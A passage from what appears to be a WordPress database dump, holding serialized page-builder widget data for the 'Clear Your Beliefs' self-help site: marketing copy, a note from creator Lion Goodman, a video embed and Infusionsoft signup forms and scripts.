[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1285, 1745, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1432:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1284, 1744, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1540:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" class="infusion-form" method="POST">\n    <input name="inf_form_xid" type="hidden" value="54657fac17ff5d88bb7ea5db95ab4742" />\n    <input name="inf_form_name" type="hidden" value="Sign up for free &#a;Clear Your Beliefs&#a;eBook" />\n    <input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n    <div class="infusion-field">\n        <label for="inf_field_FirstName">FIRST NAME *</label>\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\n    </div>\n    <div class="infusion-field">\n        <label for="inf_field_Email">EMAIL *</label>\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\n    </div>\n    <div class="infusion-submit">\n        <input type="submit" value="GET ACCESS NOW" />\n    </div>\n</form>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1288, 1748, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script 